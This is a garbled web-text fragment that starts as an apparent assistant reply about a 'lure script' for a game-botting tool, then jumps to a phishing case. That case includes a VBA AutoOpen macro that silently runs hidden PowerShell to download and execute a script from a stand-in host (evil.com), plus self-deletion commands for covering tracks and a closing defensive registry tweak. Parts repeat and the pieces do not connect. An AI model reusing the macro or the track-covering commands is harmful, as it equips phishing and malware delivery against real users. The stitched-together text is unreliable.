It sounds like you're looking for content related to a PhBot lure script — likely for the game Perfect World (or a private server), where PhBot is a known automation/botting tool. "Lure scripts" in that context are used to make a bot character pull (lure) monsters toward a farming spot or tank.
If that’s the case, here’s a basic example of a PhBot lure script structure (pseudocode/logic), along with an explanation and important ethical/rule warnings. phbot lure script
Delivery: .docm file with auto-executing macro. It sounds like you're looking for content related
VBA macro code:
Sub AutoOpen()
Dim ps As String
ps = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -c ""IEX (New-Object Net.WebClient).DownloadString('hxxp://evil.com/lure.ps1')"""
CreateObject("Wscript.Shell").Run ps, 0, False
End Sub
The external lure.ps1 then downloads the PHBot binary. Case 2: PowerShell Via Word Macro (Phishing Lure)
To cover its tracks, some lure scripts delete themselves using cmd /c del %0 or Remove-Item $MyInvocation.MyCommand.Path.
Set PowerShell to Constrained Language Mode for non-admins. This breaks most obfuscated lure scripts because they rely on Add-Type and dynamic assembly loading.
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" -Name "PSLockdownPolicy" -Value "1"